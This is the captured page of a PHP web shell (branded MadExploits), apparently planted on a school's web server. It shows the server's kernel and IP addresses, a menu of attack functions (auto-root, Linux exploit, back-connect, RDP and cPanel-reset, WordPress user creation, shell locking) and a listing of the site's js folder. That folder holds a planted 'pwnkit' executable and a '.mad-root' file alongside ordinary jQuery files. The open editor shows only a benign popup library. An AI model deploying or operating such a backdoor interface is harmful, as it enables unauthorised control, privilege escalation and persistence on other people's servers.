Linux server.nvwebsoft.co.in 3.10.0-1160.114.2.el7.x86_64 #1 SMP Wed Mar 20 15:54:52 UTC 2024 x86_64
Apache
: 162.240.12.249 | : 18.191.68.112
202 Domain
8.1.31
nbspublicschool
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
nbspublicschool /
public_html /
nbs_website /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
kd
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
alert.mob.js
1.24
KB
-rw-r--r--
bootstrap-popup.min.js
3.59
KB
-rw-r--r--
bootstrap.js
60.51
KB
-rw-r--r--
conditional.js
1.59
KB
-rw-r--r--
core.js
2.51
KB
-rw-r--r--
demo.js
40.21
KB
-rw-r--r--
jquery-1.12.0.js
95.08
KB
-rw-r--r--
jquery-1.7.2.min.js
92.62
KB
-rw-r--r--
jquery-1.9.1.js
262.09
KB
-rw-r--r--
jquery-3.1.1.min.js
84.68
KB
-rw-r--r--
jquery-ui-1.10.1.min.js
54.57
KB
-rw-r--r--
jquery-ui.min.js
234.13
KB
-rw-r--r--
jquery-validate-additional-met...
35.17
KB
-rw-r--r--
jquery.1.11.min.js
94.12
KB
-rw-r--r--
jquery.dateselect.js
6.38
KB
-rw-r--r--
jquery.datetimepicker.full.js
112.01
KB
-rw-r--r--
jquery.js
90.46
KB
-rw-r--r--
jquery.min.js
90.93
KB
-rw-r--r--
jquery.mousewheel.min.js
2.51
KB
-rw-r--r--
jquery.scroltable.min.js
1.92
KB
-rw-r--r--
jquery.validate.min.js
20.58
KB
-rw-r--r--
jsDatePick.min.1.3.js
26.04
KB
-rw-r--r--
lobibox.min.js
21.37
KB
-rw-r--r--
moment.min.js
33.24
KB
-rw-r--r--
pikaday.js
36.04
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
timepicki.js
12.63
KB
-rw-r--r--
zebra_datepicker.js
25.11
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : bootstrap-popup.min.js
/** * bootstrap-popup v1.0.0 * Copyright 2016 jsoon * Licensed under the MIT license */ !function(o){"use strict";if("function"==typeof define&&define.amd)define(["jquery","bootstrap"],o);else if("object"==typeof exports)o(require("jquery"),require("bootstrap"));else{if("undefined"==typeof jQuery)throw new Error("bootstrap-popup requires jQuery to be loaded first");if("undefined"==typeof jQuery.fn.modal)throw new Error("bootstrap-popup requires Bootstrap to be loaded first");o(jQuery,jQuery.fn.modal)}}(function(o,t){"use strict";o.bs=o.bs||{};var d=function(){var t,d,i,n,a,s,e={},l=function(o){var o=o||1e5;return Math.floor(Math.random()*o)};return e.toast=function(i,a){t="J_PopupToast"+l(),d='<div id="'+t+'" class="modal fade" tabindex="-1"><div class="modal-dialog"><div class="modal-content"><div class="modal-header"><button type="button" class="close" data-dismiss="modal">×</button><h4 class="modal-title">'+i.title+'</h4></div><div class="modal-body"><p>'+i.info+"</p></div></div></div></div>";var s=arguments[2]?arguments[2]:3e3;o("body").append(d),n=o("#"+t),n.find(".modal-dialog").css("width",i.width),n.on("shown.bs.modal",function(){"function"==typeof a?a(n):null;var t=this;setTimeout(function(){o(t).modal("hide")},s)}).modal("show"),n.on("hidden.bs.modal",function(){o(this).remove()})},e.confirm=function(i,e){t="J_PopupConfirm"+l(),d='<div id="'+t+'" class="modal fade" tabindex="-1"><div class="modal-dialog"><div class="modal-content"><div class="modal-header"><button type="button" class="close" data-dismiss="modal">×</button><h4 class="modal-title">'+i.title+'</h4></div><div class="modal-body"><p>'+i.info+'</p></div><div class="modal-footer"><button type="button" class="btn btn-default J_Cancel">Cancel</button><button type="button" class="btn btn-primary J_Ok">Confirm</button></div></div></div></div>',o("body").append(d),n=o("#"+t),n.find(".modal-dialog").css("width",i.width),n.modal("show"),a=n.find(".J_Ok"),s=n.find(".J_Cancel"),a.on("click",function(){"function"==typeof e?e(n):null}),s.on("click",function(){n.modal("hide")}),n.on("hidden.bs.modal",function(){o(this).remove()})},e.prompt=function(e,c){t="J_PopupPrompt"+l(),d='<div id="'+t+'" class="modal fade" tabindex="-1"><div class="modal-dialog"><div class="modal-content"><div class="modal-header"><button type="button" class="close" data-dismiss="modal">×</button><h4 class="modal-title">'+e.title+'</h4></div><div class="modal-body"><p>'+e.info+'</p><input type="text" class="form-control J_Message" placeholder="'+e.info+'"></div><div class="modal-footer"><button type="button" class="btn btn-default J_Cancel">Cancel</button><button type="button" class="btn btn-primary J_Ok">Confirm</button></div></div></div></div>',o("body").append(d),n=o("#"+t),n.find(".modal-dialog").css("width",e.width),n.modal("show"),a=n.find(".J_Ok"),s=n.find(".J_Cancel"),a.on("click",function(){i=n.find(".J_Message").eq(0).val(),"function"==typeof c?c(n,i):null}),s.on("click",function(){n.modal("hide")}),n.on("hidden.bs.modal",function(){o(this).remove()})},e.custom=function(i,a){t="J_PopupCustom"+l(),d='<div id="'+t+'" class="modal fade" tabindex="-1"><div class="modal-dialog"><div class="modal-content"><div class="modal-header"><button type="button" class="close" data-dismiss="modal">×</button><h4 class="modal-title">'+i.title+'</h4></div><div class="modal-body">'+i.dom+"</div></div></div></div>",o("body").append(d),n=o("#"+t),n.find(".modal-dialog").css("width",i.width),n.modal("show"),"function"==typeof a?a(n):null,n.on("hidden.bs.modal",function(){o(this).remove()})},e};o.bs.popup=d()}); //# sourceMappingURL=bootstrap-popup.min.js.map
Close